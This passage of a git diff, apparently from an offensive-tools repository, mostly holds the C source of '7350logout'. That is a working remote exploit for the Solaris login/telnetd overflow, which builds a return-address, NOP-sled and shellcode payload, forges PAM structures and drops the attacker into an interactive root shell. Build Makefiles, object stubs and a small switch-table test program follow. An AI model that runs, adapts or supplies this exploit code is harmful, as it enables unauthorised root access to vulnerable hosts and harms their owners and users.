338 telnet_prompt (fd, rbuf, sizeof (rbuf), "login: ");
339 fprintf (stderr, "# detected second login prompt\n");
340
341 if (debug) {
342 fprintf (stderr, "### attach and press enter!\n");
343 getchar ();
344 }
345 exploit (fd);
346 fprintf (stderr,
347 "# send long login bait, waiting for password prompt\n");
348 xp_final = 1;
349
350 if (fastprompt || debug) {
351 fprintf (stderr, "# press enter at the prompt\n");
352 } else {
353 telnet_prompt (fd, rbuf, sizeof (rbuf), "Password: ");
354 fprintf (stderr, "# received password prompt, success?\n");
355 write (fd, "7350\n", 5);
356
357 fprintf (stderr, "# waiting for shell "
358 "(more than 15s hanging = failure)\n");
359 telnet_prompt (fd, rbuf, sizeof (rbuf), "#");
360
361 fprintf (stderr,
362 "# detected shell prompt, successful exploitation\n");
363 fprintf (stderr, "###########################################"
364 "################################\n");
365
366 write (fd, SH_INIT, strlen (SH_INIT));
367 }
368
369 shell (fd);
370
371 exit (EXIT_SUCCESS);
372}
373
374
375unsigned int envcount;
376#define MAXARGS 63
377
378void
379exploit (int fd)
380{
381 int n;
382 unsigned char * ww; /* wbuf walker */
383 unsigned char wbuf[16384];
384 unsigned long retaddr; /* where to return to */
385 unsigned long padenv;
386
387
388 envcount = 0;
389 memset (wbuf, '\x00', sizeof (wbuf));
390 ww = &wbuf[0];
391
392 /* login name
393 */
394 ww += exploit_addstring (ww, "sP!");
395 ww += exploit_addraw (ww, '\x20');
396
397 /* 1. env: with return address
398 * retaddr is exact known middle of envbuf for given target,
399 * so it will most likely be correct for unknown targets, too.
400 * we have a total of 0x680(-1) bytes of playground.
401 */
402 retaddr = tgt->args - 0x0800 + (64 * 2) + 0x340
403 - 24 ; /* - 24 = shellcode_len / 2, padded up to next %4=0 */
404
405 fprintf (stderr, "# returning into 0x%08lx\n", retaddr);
406 if (debug)
407 ww += exploit_addptr (ww, 0x41414140);
408 else
409 ww += exploit_addptr (ww, retaddr);
410 ww += exploit_addraw (ww, '\x20');
411
412 /* 2. - 61. env just bogus data.
413 * TODO: maybe find a valid 0x00mm00mm opcode so this is real
414 * nopspace, too.
415 *
416 * - 1 = login name
417 * - 1 = retaddr data
418 * - 1 = pad
419 */
420 for (n = 0 ; n < MAXARGS - 1 - 1 - 1 ; ++n) {
421 ww += exploit_addchar (ww, 'a');
422 ww += exploit_addraw (ww, '\x20');
423 }
424
425 /* %4=0 padding before nops + shellcode
426 */
427 padenv = 4 - (envcount % 4);
428 ww += exploit_addchars (ww, 'P', padenv);
429
430 /* 63. nopspace + shellcode, padding before
431 */
432 padenv = 0x700 - envcount; /* real bytes */
433 padenv -= 1; /* minus terminating NUL char */
434 if (verbose > 2) {
435 fprintf (stderr, "envcount = %d (0x%x)\n", envcount, envcount);
436 fprintf (stderr, "padding with %ld (0x%lx) chars\n",
437 padenv, padenv);
438 }
439
440 if (debug)
441 ww += exploit_addchars (ww, '7', padenv);
442 else
443 ww += exploit_nopscode (ww, padenv);
444
445 ww += exploit_addraw (ww, '\x20');
446
447
448 /* 64. pamh, minimal survive-header, then NUL padding
449 * align so that pameptr is the 65'th pointer, yay!
450 */
451 ww += exploit_pam (ww);
452 padenv = 0x7e8 + 4 - envcount;
453 padenv -= 1;
454 ww += exploit_addchars (ww, '\x00', padenv);
455 ww += exploit_addraw (ww, '\x20');
456
457 /* 65. pameptr
458 */
459 ww += exploit_addstring (ww, "7350");
460
461 *ww++ = '\n';
462
463 n = ww - &wbuf[0];
464
465 if (verbose >= 2)
466 hexdump ("WIRE-BUFFER", wbuf, n);
467
468 nwrite (fd, wbuf, n);
469}
470
471/* 854! ;)
472 */
473void
474exploit_setenv (int fd, unsigned char *var, unsigned char *val)
475{
476 int n = 0;
477 unsigned char buf[2048];
478
479 buf[n++] = IAC;
480 buf[n++] = SB;
481 buf[n++] = TELOPT_NEW_ENVIRON;
482 buf[n++] = TELQUAL_IS;
483 buf[n++] = ENV_USERVAR;
484
485 /* should not contain < 0x04 */
486 while (*var) {
487 if (*var == IAC)
488 buf[n++] = *var;
489 buf[n++] = *var++;
490 }
491 buf[n++] = NEW_ENV_VALUE;
492 while (*val) {
493 if (*val == IAC)
494 buf[n++] = *val;
495 buf[n++] = *val++;
496 }
497 buf[n++] = IAC;
498 buf[n++] = SE;
499
500 if (send (fd, buf, n, 0) != n) {
501 perror ("xp_setenv:send");
502 exit (EXIT_FAILURE);
503 }
504}
505
506
507#define PAM_USER 2
508#define PAM_MAX_ITEMS 64
509
510unsigned int
511exploit_pam (unsigned char *ww)
512{
513 unsigned int n;
514 unsigned char * wwo = ww;
515 unsigned long no_nul_addr;
516
517
518 /* we need to set pam_user to a string != "\0" (else we have some
519 * side effects in the malloc functions/strdup, don't ask). hence we
520 * use the same address as we used for retaddr, as there is no NUL
521 * byte for sure.
522 */
523 no_nul_addr = tgt->args - 0x0800 + (64 * 2) + 0x340
524 - 24 ; /* - 24 = shellcode_len / 2, padded up to next %4=0 */
525
526 /* add pam_item ps_item[PAM_MAX_ITEMS] structures */
527 for (n = 0 ; n < PAM_USER + 1 ; ++n) {
528 if (n == PAM_USER) {
529 ww += exploit_addptr (ww, no_nul_addr);
530 ww += exploit_addptr (ww, 0x00000001);
531 } else {
532 ww += exploit_addchars (ww, '\x00', 8);
533 }
534 }
535
536 return (ww - wwo);
537}
538
539
540/* exploit_nopscode
541 *
542 * create a nop + shellcode space of `playsize' bytes in raw length.
543 * then encode buffer to `ww'. the output buffer must have the size
544 * of `playsize', so padding is our duty (not the space though).
545 *
546 * return length of encoded output (can be larger than playsize)
547 */
548
549unsigned int
550exploit_nopscode (unsigned char *ww, unsigned long playsize)
551{
552 unsigned int scw; /* shellcode walker */
553 unsigned char * wwo = ww;
554 unsigned char * cbuf = calloc (1, playsize);
555 unsigned long int sizepad = playsize & ~3;
556
557
558 /* what we do not overwrite is padding
559 */
560 memset (cbuf, 'P', playsize);
561 if (sizepad < tgt->shellcode_len) {
562 fprintf (stderr, "no room to store shellcode (%lu bytes "
563 "given, %u needed)\n", sizepad, tgt->shellcode_len);
564
565 exit (EXIT_FAILURE);
566 }
567 sizepad -= tgt->shellcode_len;
568
569 for (scw = 0 ; scw < sizepad ; scw += 4)
570 memcpy (&cbuf[scw], tgt->shellcode_nop, 4);
571 memcpy (&cbuf[sizepad], tgt->shellcode, tgt->shellcode_len);
572
573 /* encode to output
574 */
575 ww += exploit_addbuf (ww, cbuf, playsize);
576
577 if (verbose >= 2)
578 hexdump ("CODE-BUFFER", cbuf, playsize);
579
580 free (cbuf);
581
582 return (ww - wwo);
583}
584
585
586unsigned int
587exploit_addstring (unsigned char *ww, unsigned char *str)
588{
589 unsigned char * wwo = ww;
590
591 ww += exploit_addbuf (ww, str, strlen (str));
592
593 return (ww - wwo);
594}
595
596
597unsigned int
598exploit_addbuf (unsigned char *ww, unsigned char *buf, unsigned int buf_len)
599{
600 unsigned char * wwo = ww;
601
602 for ( ; buf_len > 0 ; ++buf, --buf_len)
603 ww += exploit_addchar (ww, *buf);
604
605 return (ww - wwo);
606}
607
608
609unsigned int
610exploit_addbufquot (unsigned char *ww, unsigned char *buf,
611 unsigned int buf_len)
612{
613 unsigned char wc;
614 unsigned char * wwo;
615
616 for (wwo = ww ; buf_len > 0 ; --buf_len, ++buf) {
617 wc = *buf;
618
619 *ww++ = '\\';
620 *ww++ = ((wc & 0300) >> 6) + '0';
621 *ww++ = ((wc & 0070) >> 3) + '0';
622 *ww++ = (wc & 0007) + '0';
623 envcount += 1;
624 }
625
626 return (ww - wwo);
627}
628
629
630unsigned int
631exploit_addchars (unsigned char *ww, unsigned char wc, unsigned int count)
632{
633 unsigned char * wwo;
634
635 for (wwo = ww ; count > 0 ; --count) {
636 ww += exploit_addchar (ww, wc);
637 }
638
639 return (ww - wwo);
640}
641
642
643unsigned int
644exploit_addraw (unsigned char *ww, unsigned char wc)
645{
646 if (wc == '\x20' || *ww == '\x09')
647 envcount += 1;
648
649 *ww = wc;
650
651 return (1);
652}
653
654
655unsigned int
656exploit_addchar (unsigned char *ww, unsigned char wc)
657{
658 unsigned char * wwo = ww;
659
660 switch (wc) {
661 case ('\\'):
662 *ww++ = '\\';
663 *ww++ = '\\';
664 break;
665 case (0xff):
666 case ('\n'):
667 case (' '):
668 case ('\t'):
669 *ww++ = '\\';
670 *ww++ = ((wc & 0300) >> 6) + '0';
671 *ww++ = ((wc & 0070) >> 3) + '0';
672 *ww++ = (wc & 0007) + '0';
673 break;
674 default:
675 *ww++ = wc;
676 break;
677 }
678
679 envcount += 1;
680
681 return (ww - wwo);
682}
683
684
685unsigned int
686exploit_addptrs (unsigned char *ww, unsigned long int ptr, unsigned int count)
687{
688 unsigned char * wwo;
689
690 for (wwo = ww ; count > 0 ; --count) {
691 ww += exploit_addptr (ww, ptr);
692 }
693
694 return (ww - wwo);
695}
696
697
698unsigned int
699exploit_addptr (unsigned char *ww, unsigned long int ptr)
700{
701 unsigned char * wwo = ww;
702
703 if (tgt->endianess == 0) {
704 /* big endian */
705 ww += exploit_addchar (ww, (ptr >> 24) & 0xff);
706 ww += exploit_addchar (ww, (ptr >> 16) & 0xff);
707 ww += exploit_addchar (ww, (ptr >> 8) & 0xff);
708 ww += exploit_addchar (ww, ptr & 0xff);
709 } else if (tgt->endianess == 1) {
710 /* little endian */
711 ww += exploit_addchar (ww, ptr & 0xff);
712 ww += exploit_addchar (ww, (ptr >> 8) & 0xff);
713 ww += exploit_addchar (ww, (ptr >> 16) & 0xff);
714 ww += exploit_addchar (ww, (ptr >> 24) & 0xff);
715 }
716
717 return (ww - wwo);
718}
719
720
721/* telnet_prompt
722 *
723 * loop in telnet i/o until a prompt appears, given by `prompt' parameter
724 * else behave as telnet_read would
725 */
726
727ssize_t
728telnet_prompt (int fd, unsigned char *inbuf, unsigned int inbufsize,
729 char *prompt)
730{
731 ssize_t rtemp;
732
733
734 do {
735 rtemp = telnet_read (fd, inbuf, inbufsize);
736 if (rtemp == 0) {
737 if (xp_final == 0) {
738 fprintf (stderr, "failed telnet_prompt.\n");
739 } else {
740 fprintf (stderr, "\nfailed exploitation. possible causes:\n"
741 "# 1. login patched\n"
742 "# 2. wrong target type (sparc|x86)\n"
743 "# 3. weird/no solaris version <= 2.4\n"
744 "# 4. TTYPROMPT weirdness, try again with -T option\n"
745 "# 5. try with -p -v options\n\n"
746 "good luck.\n");
747 }
748
749 exit (EXIT_FAILURE);
750 }
751
752 if (verbose >= 2) {
753 fprintf (stderr, "rbuf: ");
754 write (2, inbuf, rtemp);
755 }
756 } while (ttyp == 0 && binstrstr (inbuf, rtemp, prompt) == NULL);
757
758 return (rtemp);
759}
760
761
762unsigned char *
763binstrstr (unsigned char *binary, unsigned int bin_len, unsigned char *str)
764{
765 if (bin_len < strlen (str))
766 return (NULL);
767
768 while (binary <= (binary + bin_len - strlen (str))) {
769 if (memcmp (binary, str, strlen (str)) == 0)
770 return (binary);
771
772 binary += 1;
773 bin_len -= 1;
774 }
775
776 return (NULL);
777}
778
779
780/* telnet_read
781 *
782 * read() function that takes care of all the telnet option negotiation crap
783 *
784 * return value just like read()
785 */
786
787ssize_t
788telnet_read (int fd, unsigned char *inbuf, unsigned int inbufsize)
789{
790 ssize_t rc = 1;
791 int idleflag,
792 atecount = 1;
793
794
795 while (atecount != 0 && (idleflag = net_rtimeout (fd, 15)) == 1) {
796 rc = read (fd, inbuf, inbufsize);
797 if (verbose && rc > 0)
798 hexdump ("from wire", inbuf, rc);
799 atecount = telnet_eatall (fd, inbuf, rc);
800 rc -= atecount;
801 if (verbose && rc > 0)
802 hexdump ("after processing", inbuf, rc);
803 if (rc > 0)
804 return (rc);
805 }
806
807 fprintf (stderr, "# telnetd either died or invalid response\n");
808
809 return (rc);
810}
811
812
813/* telnet_eatall
814 *
815 * eat all telnet negotiation stuff and answer it, so we get through.
816 * basically copied 1:1 from netcat.
817 */
818
819int
820telnet_eatall (int fd, unsigned char *inbuf, unsigned int inbuf_len)
821{
822 int eat;
823 int changed;
824
825
826 for (eat = 0 ; inbuf_len > 2 ; ++inbuf, --inbuf_len) {
827 changed = 0;
828
829 if (inbuf[0] != IAC || inbuf_len < 2)
830 continue;
831
832 if (inbuf[1] == WILL && inbuf[2] == TELOPT_SGA) {
833 inbuf[1] = DO; /* IAC WILL SUPPRESSGOAHEAD, DO IT! */
834 changed = 1;
835 } else if (inbuf[1] == WILL && inbuf[2] == TELOPT_ECHO) {
836 inbuf[1] = DO; /* IAC WILL ECHO, DO IT! */
837 changed = 1;
838 } else
839 if (inbuf[1] == WILL || inbuf[1] == WONT) {
840 inbuf[1] = DONT;
841 changed = 1;
842 } else if (inbuf[1] == DO || inbuf[1] == DONT) {
843 inbuf[1] = WONT;
844 changed = 1;
845 }
846 if (changed)
847 write (fd, inbuf, 3);
848
849 if (inbuf_len > 3)
850 memmove (&inbuf[0], &inbuf[3], inbuf_len - 3);
851
852 --inbuf;
853 inbuf_len -= 2;
854 eat += 3;
855 }
856
857 return (eat);
858}
859
860
861void
862telnet_send (int fd, unsigned char type, unsigned char option)
863{
864 unsigned char buf[3];
865
866 buf[0] = IAC;
867 buf[1] = type;
868 buf[2] = option;
869
870 write (fd, buf, sizeof (buf));
871}
872
873
874void
875tgt_list (void)
876{
877 int tgt_num;
878
879
880 printf ("num . description\n");
881 printf ("----+-----------------------------------------------"
882 "--------\n");
883
884 for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
885 printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
886
887 if (verbose)
888 printf (" : 0x%08lx\n", targets[tgt_num].args);
889 }
890 printf (" '\n");
891
892 return;
893}
894
895
896void
897shell (int sock)
898{
899 int l;
900 char buf[512];
901 fd_set rfds;
902
903
904 while (1) {
905 FD_SET (0, &rfds);
906 FD_SET (sock, &rfds);
907
908 select (sock + 1, &rfds, NULL, NULL, NULL);
909 if (FD_ISSET (0, &rfds)) {
910 l = read (0, buf, sizeof (buf));
911 if (l <= 0) {
912 perror ("read user");
913 exit (EXIT_FAILURE);
914 }
915 write (sock, buf, l);
916 }
917
918 if (FD_ISSET (sock, &rfds)) {
919 l = telnet_read (sock, buf, sizeof (buf));
920 if (l <= 0) {
921 perror ("read remote");
922 exit (EXIT_FAILURE);
923 }
924 write (1, buf, l);
925 }
926 }
927}
928
929
930/* ripped from zodiac */
931void
932hexdump (char *desc, unsigned char *data, unsigned int amount)
933{
934 unsigned int dp, p; /* data pointer */
935 const char trans[] =
936 "................................ !\"#$%&'()*+,-./0123456789"
937 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
938 "nopqrstuvwxyz{|}~...................................."
939 "....................................................."
940 "........................................";
941
942
943 printf ("/* %s, %u bytes */\n", desc, amount);
944
945 for (dp = 1; dp <= amount; dp++) {
946 fprintf (stderr, "%02x ", data[dp-1]);
947 if ((dp % 8) == 0)
948 fprintf (stderr, " ");
949 if ((dp % 16) == 0) {
950 fprintf (stderr, "| ");
951 p = dp;
952 for (dp -= 16; dp < p; dp++)
953 fprintf (stderr, "%c", trans[data[dp]]);
954 fflush (stderr);
955 fprintf (stderr, "\n");
956 }
957 fflush (stderr);
958 }
959 if ((amount % 16) != 0) {
960 p = dp = 16 - (amount % 16);
961 for (dp = p; dp > 0; dp--) {
962 fprintf (stderr, " ");
963 if (((dp % 8) == 0) && (p != 8))
964 fprintf (stderr, " ");
965 fflush (stderr);
966 }
967 fprintf (stderr, " | ");
968 for (dp = (amount - (16 - p)); dp < amount; dp++)
969 fprintf (stderr, "%c", trans[data[dp]]);
970 fflush (stderr);
971 }
972 fprintf (stderr, "\n");
973
974 return;
975}
976
977
978
979unsigned long int
980net_resolve (char *host)
981{
982 long i;
983 struct hostent *he;
984
985 i = inet_addr(host);
986 if (i == -1) {
987 he = gethostbyname(host);
988 if (he == NULL) {
989 return (0);
990 } else {
991 return (*(unsigned long *) he->h_addr);
992 }
993 }
994 return (i);
995}
996
997
998int
999net_connect (struct sockaddr_in *cs, char *server,
1000 unsigned short int port, int sec)
1001{
1002 int n,
1003 len,
1004 error,
1005 flags;
1006 int fd;
1007 struct timeval tv;
1008 fd_set rset, wset;
1009 struct sockaddr_in csa;
1010
1011 if (cs == NULL)
1012 cs = &csa;
1013
1014 /* first allocate a socket */
1015 cs->sin_family = AF_INET;
1016 cs->sin_port = htons (port);
1017 fd = socket (cs->sin_family, SOCK_STREAM, 0);
1018 if (fd == -1)
1019 return (-1);
1020
1021 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
1022 close (fd);
1023 return (-1);
1024 }
1025
1026 flags = fcntl (fd, F_GETFL, 0);
1027 if (flags == -1) {
1028 close (fd);
1029 return (-1);
1030 }
1031 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
1032 if (n == -1) {
1033 close (fd);
1034 return (-1);
1035 }
1036
1037 error = 0;
1038
1039 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
1040 if (n < 0) {
1041 if (errno != EINPROGRESS) {
1042 close (fd);
1043 return (-1);
1044 }
1045 }
1046 if (n == 0)
1047 goto done;
1048
1049 FD_ZERO(&rset);
1050 FD_ZERO(&wset);
1051 FD_SET(fd, &rset);
1052 FD_SET(fd, &wset);
1053 tv.tv_sec = sec;
1054 tv.tv_usec = 0;
1055
1056 n = select(fd + 1, &rset, &wset, NULL, &tv);
1057 if (n == 0) {
1058 close(fd);
1059 errno = ETIMEDOUT;
1060 return (-1);
1061 }
1062 if (n == -1)
1063 return (-1);
1064
1065 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
1066 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
1067 len = sizeof(error);
1068 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
1069 errno = ETIMEDOUT;
1070 return (-1);
1071 }
1072 if (error == 0) {
1073 goto done;
1074 } else {
1075 errno = error;
1076 return (-1);
1077 }
1078 }
1079 } else
1080 return (-1);
1081
1082done:
1083 n = fcntl(fd, F_SETFL, flags);
1084 if (n == -1)
1085 return (-1);
1086 return (fd);
1087}
1088
1089
1090int
1091net_rtimeout (int fd, int sec)
1092{
1093 fd_set rset;
1094 struct timeval tv;
1095 int n, error, flags;
1096
1097 error = 0;
1098 flags = fcntl(fd, F_GETFL, 0);
1099 n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
1100 if (n == -1)
1101 return (-1);
1102
1103 FD_ZERO(&rset);
1104 FD_SET(fd, &rset);
1105 tv.tv_sec = sec;
1106 tv.tv_usec = 0;
1107
1108 /* now we wait until more data is received then the tcp low level watermark,
1109 * which should be setted to 1 in this case (1 is default)
1110 */
1111
1112 n = select(fd + 1, &rset, NULL, NULL, &tv);
1113 if (n == 0) {
1114 n = fcntl(fd, F_SETFL, flags);
1115 if (n == -1)
1116 return (-1);
1117 errno = ETIMEDOUT;
1118 return (-1);
1119 }
1120 if (n == -1) {
1121 return (-1);
1122 }
1123 /* socket readable ? */
1124 if (FD_ISSET(fd, &rset)) {
1125 n = fcntl(fd, F_SETFL, flags);
1126 if (n == -1)
1127 return (-1);
1128 return (1);
1129 } else {
1130 n = fcntl(fd, F_SETFL, flags);
1131 if (n == -1)
1132 return (-1);
1133 errno = ETIMEDOUT;
1134 return (-1);
1135 }
1136}
1137
1138
1139int
1140nwrite (int fd, unsigned char *ptr, unsigned int len)
1141{
1142 ssize_t retval,
1143 nwr = 0;
1144 int ff_count,
1145 pw, tw;
1146 unsigned char * sbuf;
1147
1148
1149 for (ff_count = 0, sbuf = ptr ; sbuf < &ptr[len] ; ++sbuf)
1150 if (*sbuf == 0xff)
1151 ff_count++;
1152
1153 sbuf = malloc (len + ff_count);
1154 for (pw = tw = 0 ; pw < len ; ++pw, ++tw) {
1155 sbuf[tw] = ptr[pw];
1156 if (ptr[pw] == 0xff)
1157 sbuf[++tw] = ptr[pw];
1158 }
1159 ptr = sbuf;
1160 len = tw;
1161
1162 if (verbose)
1163 hexdump ("to wire", ptr, len);
1164
1165 while (len > 0) {
1166 telnet_send (fd, WONT, TELOPT_BINARY);
1167 telnet_send (fd, WILL, TELOPT_BINARY);
1168 fprintf (stderr, "#");
1169 usleep (1000000);
1170
1171 retval = write (fd, ptr, len > 0x100 ? 0x100 : len);
1172 if (retval <= 0)
1173 return (retval);
1174 if (verbose >= 2) {
1175 fprintf (stderr, "first,second: %02x %02x "
1176 "2last,last: %02x %02x\n",
1177 ptr[0], ptr[1],
1178 ptr[retval - 2], ptr[retval - 1]);
1179 }
1180
1181 ptr += retval;
1182 len -= retval;
1183 nwr += retval;
1184 }
1185
1186 fprintf (stderr, "\n");
1187 return (nwr);
1188}
1189
diff --git a/other/burneye2/tmp/logout/7350logout.o b/other/burneye2/tmp/logout/7350logout.o
new file mode 100644
index 0000000..f974541
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/Makefile b/other/burneye2/tmp/logout/Makefile
new file mode 100644
index 0000000..9c93d0d
--- /dev/null
+++ b/other/burneye2/tmp/logout/Makefile
@@ -0,0 +1,30 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
7 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
8DIET_INCLUDE=-I/usr/include/diet
9
10# gcc --help -v 2>&1 |grep crt
11LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
12 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
13 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
14
15all: 7350logout
16
17clean:
18 rm -f *.o 7350logout-glibc 7350logout-dietlibc
19
207350logout: 7350logout-final-dietlibc.o 7350logout-final-glibc.o
21 ld -o 7350logout-dietlibc 7350logout-final-dietlibc.o
22 ld -o 7350logout-glibc 7350logout-final-glibc.o
23
247350logout-final-dietlibc.o: 7350logout.c
25 $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o 7350logout.o 7350logout.c
26 ld -r -d -o 7350logout-final-dietlibc.o 7350logout.o $(LIBS_DIET)
27
287350logout-final-glibc.o: 7350logout.c
29 $(CC) $(CFLAGS) -c -o 7350logout.o 7350logout.c
30 ld -r -d -o 7350logout-final-glibc.o 7350logout.o $(LIBS_GLIBC)
diff --git a/other/burneye2/tmp/ssh-final-dietlibc.o b/other/burneye2/tmp/ssh-final-dietlibc.o
new file mode 100644
index 0000000..f5b118e
--- /dev/null
+++ b/other/burneye2/tmp/ssh-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/switchtab/Makefile b/other/burneye2/tmp/switchtab/Makefile
new file mode 100644
index 0000000..c4224dd
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/Makefile
@@ -0,0 +1,19 @@
1
2DFLAGS=
3CC=gcc-3.2
4LD=ld
5CFLAGS=$(DFLAGS) -Wall -O
6LIBS=-Lelf -lxelf -Lia32 -lia32
7
8all: switch
9
10clean:
11 rm -f switch.o
12
13switch: switch.c
14 $(CC) $(CFLAGS) -c -o switch.o switch.c
15# $(LD) -r -o switch-final.o switch.o \
16# /usr/lib/diet/lib-i386/libc.a \
17# /usr/lib/diet/lib-i386/start.o
18
19
diff --git a/other/burneye2/tmp/switchtab/switch.c b/other/burneye2/tmp/switchtab/switch.c
new file mode 100644
index 0000000..c6b12f8
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch.c
@@ -0,0 +1,39 @@
1
2#include <unistd.h>
3
4int
5main (int argc, char *argv[])
6{
7 int change;
8
9 switch (argc) {
10 case (0):
11 change = 0;
12 break;
13 case (1):
14 change = 7;
15 break;
16 case (3):
17 change = 12;
18 break;
19 case (4):
20 change = 49;
21 break;
22 case (5):
23 change = 18;
24 break;
25 case (6):
26 change = 4;
27 break;
28 case (7):
29 change = 13;
30 break;
31 default:
32 change = 0;
33 break;
34 }
35
36 return (change);
37}
38
39
diff --git a/other/burneye2/tmp/switchtab/switch.o b/other/burneye2/tmp/switchtab/switch.o
new file mode 100644
index 0000000..8fc5f92
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch.o
Binary files differ
diff --git a/other/burneye2/tmp/switchtab/switch_output.c b/other/burneye2/tmp/switchtab/switch_output.c
new file mode 100644
index 0000000..ef22580
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch_output.c
@@ -0,0 +1,41 @@
1
2#include <unistd.h>
3
4int
5main (int argc, char *argv[])
6{
7 int change;
8
9 switch (argc) {
10 case (0):
11 change = 0;
12 break;
13 case (1):
14 change = 7;
15 break;
16 case (3):
17 change = 12;
18 break;
19 case (4):
20 change = 49;
21 break;
22 case (5):
23 change = 18;
24 break;
25 case (6):
26 change = 4;
27 break;
28 case (7):
29 change = 13;
30 break;
31 default:
32 change = 0;
33 break;
34 }
35
36 printf ("change: %d\n", change);
37
38 return (change);
39}
40
41
diff --git a/other/burneye2/tmp/switchtab/switch_output.o b/other/burneye2/tmp/switchtab/switch_output.o
new file mode 100644
index 0000000..0e81959
--- /dev/null
+++ b/other/burneye2/tmp/switchtab/switch_output.o
Binary files differ